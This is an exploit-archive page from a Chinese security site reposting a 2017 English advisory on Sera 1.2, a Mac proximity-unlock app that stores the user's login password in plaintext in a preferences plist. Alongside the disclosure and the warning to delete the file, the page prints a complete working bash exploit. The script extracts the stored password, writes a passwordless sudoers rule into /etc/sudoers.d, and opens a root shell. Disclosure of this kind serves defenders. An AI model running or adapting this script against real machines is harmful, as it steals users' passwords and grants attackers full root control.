首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sera 1.2 Local Root / Password Disclosure
来源:https://m4.rkw.io 作者:Wadham 发布时间:2017-11-03  
Sera is a free app for mac and iOS that lets you unlock your mac automatically
when your iphone is within a configured proximity.

Unfortunately to facilitate this it stores the users login password in their
home directory at:

~/Library/Preferences/no.ignitum.SeraOSX.plist

This makes root privilege escalation trivial and worse than that even
facilitates dumping the keychain as we can easily obtain the user's login
password. If they are an admin user we can even dump items from the system
keychain.

The author of Sera has said he will shut the project down and make the code
publicly available so no fix is likely to be forthcoming anytime soon.

It is strongly recommended not to use this app and if you have done so in the
past make sure you remove this file that contains your login password.

https://m4.rkw.io/sera_1.2.sh.txt
dbf4f7b64cac8a60a2c7b3ba2a3988b84a148a3f6e31bcb58d4554e5e74d8edf
-------------------------------------------------------------------------
#!/bin/bash

##############################################################
###### sera 1.2 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html           ######
##############################################################

sera_pass=`plutil -p ~/Library/Preferences/no.ignitum.SeraOSX.plist |grep '"sera_pass"' |cut -d '"' -f4`

if [ "$sera_pass" == "" ] ; then
  echo "Password not found."
  exit 1
fi

echo "user's password is: $sera_pass"

user="`whoami`"

echo "$user ALL=(ALL) NOPASSWD:ALL" > /tmp/sera_12_exp

echo "$sera_pass" | sudo -S chown root:wheel /tmp/sera_12_exp 1>/dev/null 2>/dev/null
echo "$sera_pass" | sudo -S mv /tmp/sera_12_exp /etc/sudoers.d/sera_12_exp 1>/dev/null 2>/dev/null

sudo bash -c 'rm -f /etc/sudoers.d/sera_12_exp; /bin/bash'


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Vir.IT eXplorer Anti-Virus - P
·Oracle PeopleSoft Enterprise P
·WhatsApp 2.17.52 - Memory Corr
·GraphicsMagick - Memory Disclo
·Easy MPEG/AVI/DIVX/WMV/RM to D
·tnftp - 'savefile' Arbitrary C
·Oracle Java SE - Web Start jnl
·WordPress WP Mobile Detector 3
·Tizen Studio 1.3 Smart Develop
·Avaya IP Office (IPO) 10.1 Act
·DameWare Remote Controller < 1
·Avaya IP Office (IPO) 10.1 Sof
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved